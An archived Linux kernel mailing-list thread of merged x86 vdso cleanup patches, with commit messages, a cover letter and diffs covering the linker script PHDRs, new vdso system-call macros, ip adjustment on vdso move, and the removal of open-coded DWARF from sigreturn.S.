Gitweb: https://git.kernel.org/tip/8717b02b8c030dc0c4b55781b59e88def0a1a92f
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:26:01 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/entry/vdso: Include GNU_PROPERTY and GNU_STACK PHDRs
Currently the vdso doesn't include .note.gnu.property or a GNU noexec
stack annotation (the -z noexecstack in the linker script is
ineffective because we specify PHDRs explicitly.)
The motivation is that the dynamic linker currently does not check
these.
However, this is a weak excuse: the vdso*.so are also supposed to be
usable as link libraries, and there is no reason why the dynamic
linker might not want or need to check these in the future, so add
them back in -- it is trivial enough.
Use symbolic constants for the PHDR permission flags.
[ v4: drop unrelated formatting changes ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-8-hpa@zytor.com
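As a sanity check on the numeric values introduced below, the FLAGS() encodings and the PT_GNU_* program header types match the standard ELF definitions from <elf.h>. This is a standalone user-space check, not kernel code; the PT_GNU_PROPERTY fallback define covers older libc headers.

```c
#include <elf.h>

#ifndef PT_GNU_PROPERTY
#define PT_GNU_PROPERTY 0x6474e553	/* older elf.h may lack this */
#endif

/*
 * The linker script spells the segment permission flags numerically:
 * FLAGS(4) = PF_R, FLAGS(5) = PF_R|PF_X, FLAGS(6) = PF_R|PF_W.
 */
static unsigned long pf_r(void)  { return PF_R; }
static unsigned long pf_rx(void) { return PF_R | PF_X; }
static unsigned long pf_rw(void) { return PF_R | PF_W; }
```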
---
arch/x86/entry/vdso/common/vdso-layout.lds.S | 38 +++++++++++--------
1 file changed, 23 insertions(+), 15 deletions(-)
diff --git a/arch/x86/entry/vdso/common/vdso-layout.lds.S b/arch/x86/entry/vdso/common/vdso-layout.lds.S
index ec1ac19..a1e30be 100644
--- a/arch/x86/entry/vdso/common/vdso-layout.lds.S
+++ b/arch/x86/entry/vdso/common/vdso-layout.lds.S
@@ -47,18 +47,18 @@ SECTIONS
*(.gnu.linkonce.b.*)
} :text
- /*
- * Discard .note.gnu.property sections which are unused and have
- * different alignment requirement from vDSO note sections.
- */
- /DISCARD/ : {
+ .note.gnu.property : {
*(.note.gnu.property)
- }
- .note : { *(.note.*) } :text :note
-
- .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
- .eh_frame : { KEEP (*(.eh_frame)) } :text
+ } :text :note :gnu_property
+ .note : {
+ *(.note*)
+ } :text :note
+ .eh_frame_hdr : { *(.eh_frame_hdr) } :text :eh_frame_hdr
+ .eh_frame : {
+ KEEP (*(.eh_frame))
+ *(.eh_frame.*)
+ } :text
/*
* Text is well-separated from actual data: there's plenty of
@@ -87,15 +87,23 @@ SECTIONS
* Very old versions of ld do not recognize this name token; use the constant.
*/
#define PT_GNU_EH_FRAME 0x6474e550
+#define PT_GNU_STACK 0x6474e551
+#define PT_GNU_PROPERTY 0x6474e553
/*
* We must supply the ELF program headers explicitly to get just one
* PT_LOAD segment, and set the flags explicitly to make segments read-only.
- */
+*/
+#define PF_R FLAGS(4)
+#define PF_RW FLAGS(6)
+#define PF_RX FLAGS(5)
+
PHDRS
{
- text PT_LOAD FLAGS(5) FILEHDR PHDRS; /* PF_R|PF_X */
- dynamic PT_DYNAMIC FLAGS(4); /* PF_R */
- note PT_NOTE FLAGS(4); /* PF_R */
- eh_frame_hdr PT_GNU_EH_FRAME;
+ text PT_LOAD PF_RX FILEHDR PHDRS;
+ dynamic PT_DYNAMIC PF_R;
+ note PT_NOTE PF_R;
+ eh_frame_hdr PT_GNU_EH_FRAME PF_R;
+ gnu_stack PT_GNU_STACK PF_RW;
+ gnu_property PT_GNU_PROPERTY PF_R;
}
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:52 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: a0636d4c3ad0da0cd6069eb6fef5d2b7d3449378
Gitweb: https://git.kernel.org/tip/a0636d4c3ad0da0cd6069eb6fef5d2b7d3449378
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:26:02 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/vdso: Abstract out vdso system call internals
Abstract out the calling of true system calls from the vdso into
macros.
It has been a very long time since gcc disallowed %ebx or %ebp in
inline asm in 32-bit PIC mode; remove the corresponding hacks.
Remove the use of memory output constraints in gettimeofday.h in favor
of "memory" clobbers. The resulting code is identical for the current
use cases, as the system call is usually a terminal fallback anyway,
and it merely complicates the macroization.
This patch adds only a handful more lines of code than it removes,
and in fact could be made substantially smaller by removing the macros
for the argument counts that aren't currently used, however, it seems
better to be general from the start.
[ v3: remove stray comment from prototyping; remove VDSO_SYSCALL6()
since it would require special handling on 32 bits and is
currently unused. (Uros Bizjak)
Indent nested preprocessor directives. ]
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Acked-by: Uros Bizjak <ubizjak@gmail.com>
Link: https://patch.msgid.link/20251216212606.1325678-9-hpa@zytor.com
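For reference, what a VDSO_SYSCALL2()-based fallback ultimately performs is an ordinary system call with the arguments placed in the first two argument registers. A hedged user-space model of clock_gettime_fallback(), using the libc syscall(2) wrapper instead of the vdso's inline asm (the function name here is illustrative):

```c
#define _GNU_SOURCE
#include <sys/syscall.h>
#include <time.h>
#include <unistd.h>

/*
 * Models what VDSO_SYSCALL2(clock_gettime,64,_clkid,_ts) boils down
 * to: issue __NR_clock_gettime with the clockid and timespec pointer
 * as the first two syscall arguments. syscall(2) does the same
 * register setup that the vdso macros do with inline asm.
 */
static long clock_gettime_fallback_model(clockid_t clkid,
					 struct timespec *ts)
{
	return syscall(SYS_clock_gettime, clkid, ts);
}
```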
---
arch/x86/include/asm/vdso/gettimeofday.h | 108 +---------------------
arch/x86/include/asm/vdso/sys_call.h | 103 +++++++++++++++++++++-
2 files changed, 111 insertions(+), 100 deletions(-)
create mode 100644 arch/x86/include/asm/vdso/sys_call.h
diff --git a/arch/x86/include/asm/vdso/gettimeofday.h b/arch/x86/include/asm/vdso/gettimeofday.h
index 73b2e7e..3cf214c 100644
--- a/arch/x86/include/asm/vdso/gettimeofday.h
+++ b/arch/x86/include/asm/vdso/gettimeofday.h
@@ -18,6 +18,7 @@
#include <asm/msr.h>
#include <asm/pvclock.h>
#include <clocksource/hyperv_timer.h>
+#include <asm/vdso/sys_call.h>
#define VDSO_HAS_TIME 1
@@ -53,130 +54,37 @@ extern struct ms_hyperv_tsc_page hvclock_page
__attribute__((visibility("hidden")));
#endif
-#ifndef BUILD_VDSO32
-
static __always_inline
long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_gettime), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,64,_clkid,_ts);
}
static __always_inline
long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
struct timezone *_tz)
{
- long ret;
-
- asm("syscall" : "=a" (ret) :
- "0" (__NR_gettimeofday), "D" (_tv), "S" (_tz) : "memory");
-
- return ret;
+ return VDSO_SYSCALL2(gettimeofday,,_tv,_tz);
}
static __always_inline
long clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
{
- long ret;
-
- asm ("syscall" : "=a" (ret), "=m" (*_ts) :
- "0" (__NR_clock_getres), "D" (_clkid), "S" (_ts) :
- "rcx", "r11");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,_time64,_clkid,_ts);
}
-#else
-
-static __always_inline
-long clock_gettime_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
+#ifndef CONFIG_X86_64
static __always_inline
long clock_gettime32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_gettime), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long gettimeofday_fallback(struct __kernel_old_timeval *_tv,
- struct timezone *_tz)
-{
- long ret;
-
- asm(
- "mov %%ebx, %%edx \n"
- "mov %2, %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret)
- : "0" (__NR_gettimeofday), "g" (_tv), "c" (_tz)
- : "memory", "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_gettime,,_clkid,_ts);
}
static __always_inline long
-clock_getres_fallback(clockid_t _clkid, struct __kernel_timespec *_ts)
-{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres_time64), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
-}
-
-static __always_inline
-long clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
+clock_getres32_fallback(clockid_t _clkid, struct old_timespec32 *_ts)
{
- long ret;
-
- asm (
- "mov %%ebx, %%edx \n"
- "mov %[clock], %%ebx \n"
- "call __kernel_vsyscall \n"
- "mov %%edx, %%ebx \n"
- : "=a" (ret), "=m" (*_ts)
- : "0" (__NR_clock_getres), [clock] "g" (_clkid), "c" (_ts)
- : "edx");
-
- return ret;
+ return VDSO_SYSCALL2(clock_getres,,_clkid,_ts);
}
#endif
diff --git a/arch/x86/include/asm/vdso/sys_call.h b/arch/x86/include/asm/vdso/sys_call.h
new file mode 100644
index 0000000..dcfd17c
--- /dev/null
+++ b/arch/x86/include/asm/vdso/sys_call.h
@@ -0,0 +1,103 @@
+/* SPDX-License-Identifier: GPL-2.0 */
+/*
+ * Macros for issuing an inline system call from the vDSO.
+ */
+
+#ifndef X86_ASM_VDSO_SYS_CALL_H
+#define X86_ASM_VDSO_SYS_CALL_H
+
+#include <linux/compiler.h>
+#include <asm/cpufeatures.h>
+#include <asm/alternative.h>
+
+#ifdef CONFIG_X86_64
+# define __sys_instr "syscall"
+# define __sys_clobber "rcx", "r11", "memory"
+# define __sys_nr(x,y) __NR_ ## x
+# define __sys_reg1 "rdi"
+# define __sys_reg2 "rsi"
+# define __sys_reg3 "rdx"
+# define __sys_reg4 "r10"
+# define __sys_reg5 "r8"
+#else
+# define __sys_instr "call __kernel_vsyscall"
+# define __sys_clobber "memory"
+# define __sys_nr(x,y) __NR_ ## x ## y
+# define __sys_reg1 "ebx"
+# define __sys_reg2 "ecx"
+# define __sys_reg3 "edx"
+# define __sys_reg4 "esi"
+# define __sys_reg5 "edi"
+#endif
+
+/*
+ * Example usage:
+ *
+ * result = VDSO_SYSCALL3(foo,64,x,y,z);
+ *
+ * ... calls foo(x,y,z) on 64 bits, and foo64(x,y,z) on 32 bits.
+ *
+ * VDSO_SYSCALL6() is currently missing, because it would require
+ * special handling for %ebp on 32 bits when the vdso is compiled with
+ * frame pointers enabled (the default on 32 bits.) Add it as a special
+ * case when and if it becomes necessary.
+ */
+#define _VDSO_SYSCALL(name,suf32,...) \
+ ({ \
+ long _sys_num_ret = __sys_nr(name,suf32); \
+ asm_inline volatile( \
+ __sys_instr \
+ : "+a" (_sys_num_ret) \
+ : __VA_ARGS__ \
+ : __sys_clobber); \
+ _sys_num_ret; \
+ })
+
+#define VDSO_SYSCALL0(name,suf32) \
+ _VDSO_SYSCALL(name,suf32)
+#define VDSO_SYSCALL1(name,suf32,a1) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1)); \
+ })
+#define VDSO_SYSCALL2(name,suf32,a1,a2) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2)); \
+ })
+#define VDSO_SYSCALL3(name,suf32,a1,a2,a3) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3)); \
+ })
+#define VDSO_SYSCALL4(name,suf32,a1,a2,a3,a4) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4)); \
+ })
+#define VDSO_SYSCALL5(name,suf32,a1,a2,a3,a4,a5) \
+ ({ \
+ register long _sys_arg1 asm(__sys_reg1) = (long)(a1); \
+ register long _sys_arg2 asm(__sys_reg2) = (long)(a2); \
+ register long _sys_arg3 asm(__sys_reg3) = (long)(a3); \
+ register long _sys_arg4 asm(__sys_reg4) = (long)(a4); \
+ register long _sys_arg5 asm(__sys_reg5) = (long)(a5); \
+ _VDSO_SYSCALL(name,suf32, \
+ "r" (_sys_arg1), "r" (_sys_arg2), \
+ "r" (_sys_arg3), "r" (_sys_arg4), \
+ "r" (_sys_arg5)); \
+ })
+
+#endif /* X86_ASM_VDSO_SYS_CALL_H */
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:51 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
This patchset cleans up the vdso build by building the 32- and 64-bit
vdsos in separate directories, moving the vdso2c tool to
arch/x86/tools, and by merging common code and especially Makefile
rules between the 32- and 64-bit vdsos to the greatest extent
possible.
Be more strict about sanitizing and standardizing the vdso build
options.
Disable CFI for the vdso until the kernel adds user space IBT support.
Modernize the DWARF generation in vdso32/sigreturn.S.
Add macros to cleanly call system calls from vdso source code.
Add the GNU_PROPERTY and GNU_STACK PHDRs to the vdso.
When using int $0x80 (old 32-bit hardware or FRED-capable 64-bit
hardware) skip the stack stuff in the 32-bit kernel entry code and
call int $0x80 directly when used from C code.
Changes from v3 to v4:
- Improved description of patch 01/10.
- Split out the move of vdso2c to tools into a separate patch.
- Remove unrelated formatting changes from vdso-layout.lds.S.
- Fix *-x32.o being missing from "targets".
- Rebased onto v6.19-rc1.
Changes from v2 to v3:
In arch/x86/include/asm/vdso/sys_call.h:
- remove stray comment from prototyping (Uros Bizjak)
- remove VDSO_SYSCALL6() since it would require special
handling on 32 bits with frame pointers and is
currently unused. (Uros Bizjak)
- indent nested preprocessor directives.
Changes from v1 to v2:
Too many to count - much of the patchset has been reworked
Patches:
x86/entry/vdso: rename vdso_image_* to vdso*_image
x86/entry/vdso: move vdso2c to arch/x86/tools
x86/entry/vdso: refactor the vdso build
x86/entry/vdso32: don't rely on int80_landing_pad for adjusting ip
x86/entry/vdso32: remove SYSCALL_ENTER_KERNEL macro in sigreturn.S
x86/entry/vdso32: remove open-coded DWARF in sigreturn.S
x86/entry/vdso: include GNU_PROPERTY and GNU_STACK PHDRs
x86/vdso: abstract out vdso system call internals
x86/cpufeature: replace X86_FEATURE_SYSENTER32 with X86_FEATURE_SYSFAST32
x86/entry/vdso32: when using int $0x80, use it directly
---
arch/x86/Kconfig.cpufeatures | 8 +
arch/x86/Makefile | 2 +-
arch/x86/entry/syscall_32.c | 2 +-
arch/x86/entry/vdso/.gitignore | 11 +-
arch/x86/entry/vdso/Makefile | 162 +--------------------
arch/x86/entry/vdso/common/Makefile.include | 89 +++++++++++
arch/x86/entry/vdso/{vdso-note.S => common/note.S} | 5 +-
arch/x86/entry/vdso/{ => common}/vclock_gettime.c | 0
arch/x86/entry/vdso/{ => common}/vdso-layout.lds.S | 38 +++--
arch/x86/entry/vdso/{ => common}/vgetcpu.c | 0
arch/x86/entry/vdso/vdso32/Makefile | 24 +++
arch/x86/entry/vdso/vdso32/note.S | 19 +--
arch/x86/entry/vdso/vdso32/sigreturn.S | 152 +++++--------------
arch/x86/entry/vdso/vdso32/system_call.S | 22 ++-
arch/x86/entry/vdso/vdso32/vclock_gettime.c | 5 +-
arch/x86/entry/vdso/vdso32/vdso32.lds.S | 2 +-
arch/x86/entry/vdso/vdso32/vgetcpu.c | 4 +-
arch/x86/entry/vdso/vdso64/Makefile | 46 ++++++
arch/x86/entry/vdso/vdso64/note.S | 1 +
arch/x86/entry/vdso/vdso64/vclock_gettime.c | 1 +
.../entry/vdso/{vdso.lds.S => vdso64/vdso64.lds.S} | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vdsox32.lds.S | 2 +-
arch/x86/entry/vdso/vdso64/vgetcpu.c | 1 +
.../entry/vdso/{ => vdso64}/vgetrandom-chacha.S | 0
arch/x86/entry/vdso/{ => vdso64}/vgetrandom.c | 2 +-
arch/x86/entry/vdso/{ => vdso64}/vsgx.S | 0
arch/x86/entry/vdso/vma.c | 24 ++-
arch/x86/include/asm/cpufeatures.h | 2 +-
arch/x86/include/asm/dwarf2.h | 1 +
arch/x86/include/asm/elf.h | 2 +-
arch/x86/include/asm/vdso.h | 6 +-
arch/x86/include/asm/vdso/gettimeofday.h | 108 +-------------
arch/x86/include/asm/vdso/sys_call.h | 105 +++++++++++++
arch/x86/kernel/asm-offsets.c | 6 +
arch/x86/kernel/cpu/centaur.c | 3 -
arch/x86/kernel/cpu/common.c | 8 +
arch/x86/kernel/cpu/intel.c | 4 +-
arch/x86/kernel/cpu/zhaoxin.c | 4 +-
arch/x86/kernel/fred.c | 2 +-
arch/x86/kernel/process_64.c | 6 +-
arch/x86/kernel/signal_32.c | 4 +-
arch/x86/tools/Makefile | 15 +-
arch/x86/{entry/vdso => tools}/vdso2c.c | 0
arch/x86/{entry/vdso => tools}/vdso2c.h | 0
arch/x86/xen/setup.c | 28 ++--
arch/x86/xen/smp_pv.c | 5 +-
arch/x86/xen/xen-ops.h | 1 -
47 files changed, 444 insertions(+), 490 deletions(-)
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 6e150b71019f386a021004fafea9ef7189bc6aea
Gitweb: https://git.kernel.org/tip/6e150b71019f386a021004fafea9ef7189bc6aea
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:25:58 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/entry/vdso32: Don't rely on int80_landing_pad for adjusting ip
There is no fundamental reason to use the int80_landing_pad symbol to
adjust ip when moving the vdso. If ip falls within the vdso, and the
vdso is moved, we should change the ip accordingly, regardless of mode
or location within the vdso. This *currently* can only happen on 32
bits, but there isn't any reason not to do so generically.
Note that if this is ever possible from a vdso-internal call, then the
user space stack will also need to be adjusted (as well as the
shadow stack, if enabled.) Fortunately this is not currently the case.
At the moment, we don't even consider other threads when moving the
vdso. The assumption is that it is only used by process freeze/thaw
for migration, where this is not an issue.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-5-hpa@zytor.com
---
arch/x86/entry/vdso/vma.c | 16 ++++++----------
1 file changed, 6 insertions(+), 10 deletions(-)
diff --git a/arch/x86/entry/vdso/vma.c b/arch/x86/entry/vdso/vma.c
index 8f98c2d..e7fd751 100644
--- a/arch/x86/entry/vdso/vma.c
+++ b/arch/x86/entry/vdso/vma.c
@@ -65,16 +65,12 @@ static vm_fault_t vdso_fault(const struct vm_special_mapping *sm,
static void vdso_fix_landing(const struct vdso_image *image,
struct vm_area_struct *new_vma)
{
- if (in_ia32_syscall() && image == &vdso32_image) {
- struct pt_regs *regs = current_pt_regs();
- unsigned long vdso_land = image->sym_int80_landing_pad;
- unsigned long old_land_addr = vdso_land +
- (unsigned long)current->mm->context.vdso;
-
- /* Fixing userspace landing - look at do_fast_syscall_32 */
- if (regs->ip == old_land_addr)
- regs->ip = new_vma->vm_start + vdso_land;
- }
+ struct pt_regs *regs = current_pt_regs();
+ unsigned long ipoffset = regs->ip -
+ (unsigned long)current->mm->context.vdso;
+
+ if (ipoffset < image->size)
+ regs->ip = new_vma->vm_start + ipoffset;
}
static int vdso_mremap(const struct vm_special_mapping *sm,
|
{
"author": "\"tip-bot2 for H. Peter Anvin\" <tip-bot2@linutronix.de>",
"date": "Wed, 14 Jan 2026 00:44:55 -0000",
"thread_id": "vdso-cleanup-patch-4.1@zytor.com.mbox.gz"
}
|
lkml
|
[PATCH v4 00/10] x86/entry/vdso: clean up the vdso build, vdso updates
|
|
The following commit has been merged into the x86/entry branch of tip:
Commit-ID: 884961618ee51307cc63ab620a0bdd710fa0b0af
Gitweb: https://git.kernel.org/tip/884961618ee51307cc63ab620a0bdd710fa0b0af
Author: H. Peter Anvin <hpa@zytor.com>
AuthorDate: Tue, 16 Dec 2025 13:26:00 -08:00
Committer: Dave Hansen <dave.hansen@linux.intel.com>
CommitterDate: Tue, 13 Jan 2026 16:37:58 -08:00
x86/entry/vdso32: Remove open-coded DWARF in sigreturn.S
The vdso32 sigreturn.S contains open-coded DWARF bytecode, which
includes a hack for gdb to not try to step back to a previous call
instruction when backtracing from a signal handler.
Neither of those are necessary anymore: the backtracing issue is
handled by ".cfi_startproc simple" and ".cfi_signal_frame", both of which
have been supported for a very long time now, which allows the
remaining frame to be built using regular .cfi annotations.
Add a few more register offsets to the signal frame just for good
measure.
Replace the nop on fallthrough of the system call (which should never,
ever happen) with a ud2a trap.
Signed-off-by: H. Peter Anvin (Intel) <hpa@zytor.com>
Signed-off-by: Dave Hansen <dave.hansen@linux.intel.com>
Link: https://patch.msgid.link/20251216212606.1325678-7-hpa@zytor.com
---
arch/x86/entry/vdso/vdso32/sigreturn.S | 146 +++++-------------------
arch/x86/include/asm/dwarf2.h | 1 +-
arch/x86/kernel/asm-offsets.c | 6 +-
3 files changed, 39 insertions(+), 114 deletions(-)
diff --git a/arch/x86/entry/vdso/vdso32/sigreturn.S b/arch/x86/entry/vdso/vdso32/sigreturn.S
index 965900c..25b0ac4 100644
--- a/arch/x86/entry/vdso/vdso32/sigreturn.S
+++ b/arch/x86/entry/vdso/vdso32/sigreturn.S
@@ -1,136 +1,54 @@
/* SPDX-License-Identifier: GPL-2.0 */
#include <linux/linkage.h>
#include <asm/unistd_32.h>
+#include <asm/dwarf2.h>
#include <asm/asm-offsets.h>
+.macro STARTPROC_SIGNAL_FRAME sc
+ CFI_STARTPROC simple
+ CFI_SIGNAL_FRAME
+ /* -4 as pretcode has already been popped */
+ CFI_DEF_CFA esp, \sc - 4
+ CFI_OFFSET eip, IA32_SIGCONTEXT_ip
+ CFI_OFFSET eax, IA32_SIGCONTEXT_ax
+ CFI_OFFSET ebx, IA32_SIGCONTEXT_bx
+ CFI_OFFSET ecx, IA32_SIGCONTEXT_cx
+ CFI_OFFSET edx, IA32_SIGCONTEXT_dx
+ CFI_OFFSET esp, IA32_SIGCONTEXT_sp
+ CFI_OFFSET ebp, IA32_SIGCONTEXT_bp
+ CFI_OFFSET esi, IA32_SIGCONTEXT_si
+ CFI_OFFSET edi, IA32_SIGCONTEXT_di
+ CFI_OFFSET es, IA32_SIGCONTEXT_es
+ CFI_OFFSET cs, IA32_SIGCONTEXT_cs
+ CFI_OFFSET ss, IA32_SIGCONTEXT_ss
+ CFI_OFFSET ds, IA32_SIGCONTEXT_ds
+ CFI_OFFSET eflags, IA32_SIGCONTEXT_flags
+.endm
+
.text
.globl __kernel_sigreturn
.type __kernel_sigreturn,@function
- nop /* this guy is needed for .LSTARTFDEDLSI1 below (watch for HACK) */
ALIGN
__kernel_sigreturn:
-.LSTART_sigreturn:
- popl %eax /* XXX does this mean it needs unwind info? */
+ STARTPROC_SIGNAL_FRAME IA32_SIGFRAME_sigcontext
+ popl %eax
+ CFI_ADJUST_CFA_OFFSET -4
movl $__NR_sigreturn, %eax
int $0x80
-.LEND_sigreturn:
SYM_INNER_LABEL(vdso32_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_sigreturn,.-.LSTART_sigreturn
+ ud2a
+ CFI_ENDPROC
+ .size __kernel_sigreturn,.-__kernel_sigreturn
.globl __kernel_rt_sigreturn
.type __kernel_rt_sigreturn,@function
ALIGN
__kernel_rt_sigreturn:
-.LSTART_rt_sigreturn:
+ STARTPROC_SIGNAL_FRAME IA32_RT_SIGFRAME_sigcontext
movl $__NR_rt_sigreturn, %eax
int $0x80
-.LEND_rt_sigreturn:
SYM_INNER_LABEL(vdso32_rt_sigreturn_landing_pad, SYM_L_GLOBAL)
- nop
- .size __kernel_rt_sigreturn,.-.LSTART_rt_sigreturn
- .previous
-
- .section .eh_frame,"a",@progbits
-.LSTARTFRAMEDLSI1:
- .long .LENDCIEDLSI1-.LSTARTCIEDLSI1
-.LSTARTCIEDLSI1:
- .long 0 /* CIE ID */
- .byte 1 /* Version number */
- .string "zRS" /* NUL-terminated augmentation string */
- .uleb128 1 /* Code alignment factor */
- .sleb128 -4 /* Data alignment factor */
- .byte 8 /* Return address register column */
- .uleb128 1 /* Augmentation value length */
- .byte 0x1b /* DW_EH_PE_pcrel|DW_EH_PE_sdata4. */
- .byte 0 /* DW_CFA_nop */
- .align 4
-.LENDCIEDLSI1:
- .long .LENDFDEDLSI1-.LSTARTFDEDLSI1 /* Length FDE */
-.LSTARTFDEDLSI1:
- .long .LSTARTFDEDLSI1-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: The dwarf2 unwind routines will subtract 1 from the
- return address to get an address in the middle of the
- presumed call instruction. Since we didn't get here via
- a call, we need to include the nop before the real start
- to make up for it. */
- .long .LSTART_sigreturn-1-. /* PC-relative start address */
- .long .LEND_sigreturn-.LSTART_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- complicated by the fact that the "CFA" is always assumed to
- be the value of the stack pointer in the caller. This means
- that we must define the CFA of this body of code to be the
- saved value of the stack pointer in the sigcontext. Which
- also means that there is no fixed relation to the other
- saved registers, which means that we must use DW_CFA_expression
- to compute their addresses. It also means that when we
- adjust the stack with the popl, we have to do it all over again. */
-
-#define do_cfa_expr(offset) \
- .byte 0x0f; /* DW_CFA_def_cfa_expression */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
- .byte 0x06; /* DW_OP_deref */ \
-1:
-
-#define do_expr(regno, offset) \
- .byte 0x10; /* DW_CFA_expression */ \
- .uleb128 regno; /* regno */ \
- .uleb128 1f-0f; /* length */ \
-0: .byte 0x74; /* DW_OP_breg4 */ \
- .sleb128 offset; /* offset */ \
-1:
-
- do_cfa_expr(IA32_SIGCONTEXT_sp+4)
- do_expr(0, IA32_SIGCONTEXT_ax+4)
- do_expr(1, IA32_SIGCONTEXT_cx+4)
- do_expr(2, IA32_SIGCONTEXT_dx+4)
- do_expr(3, IA32_SIGCONTEXT_bx+4)
- do_expr(5, IA32_SIGCONTEXT_bp+4)
- do_expr(6, IA32_SIGCONTEXT_si+4)
- do_expr(7, IA32_SIGCONTEXT_di+4)
- do_expr(8, IA32_SIGCONTEXT_ip+4)
-
- .byte 0x42 /* DW_CFA_advance_loc 2 -- nop; popl eax. */
-
- do_cfa_expr(IA32_SIGCONTEXT_sp)
- do_expr(0, IA32_SIGCONTEXT_ax)
- do_expr(1, IA32_SIGCONTEXT_cx)
- do_expr(2, IA32_SIGCONTEXT_dx)
- do_expr(3, IA32_SIGCONTEXT_bx)
- do_expr(5, IA32_SIGCONTEXT_bp)
- do_expr(6, IA32_SIGCONTEXT_si)
- do_expr(7, IA32_SIGCONTEXT_di)
- do_expr(8, IA32_SIGCONTEXT_ip)
-
- .align 4
-.LENDFDEDLSI1:
-
- .long .LENDFDEDLSI2-.LSTARTFDEDLSI2 /* Length FDE */
-.LSTARTFDEDLSI2:
- .long .LSTARTFDEDLSI2-.LSTARTFRAMEDLSI1 /* CIE pointer */
- /* HACK: See above wrt unwind library assumptions. */
- .long .LSTART_rt_sigreturn-1-. /* PC-relative start address */
- .long .LEND_rt_sigreturn-.LSTART_rt_sigreturn+1
- .uleb128 0 /* Augmentation */
- /* What follows are the instructions for the table generation.
- We record the locations of each register saved. This is
- slightly less complicated than the above, since we don't
- modify the stack pointer in the process. */
-
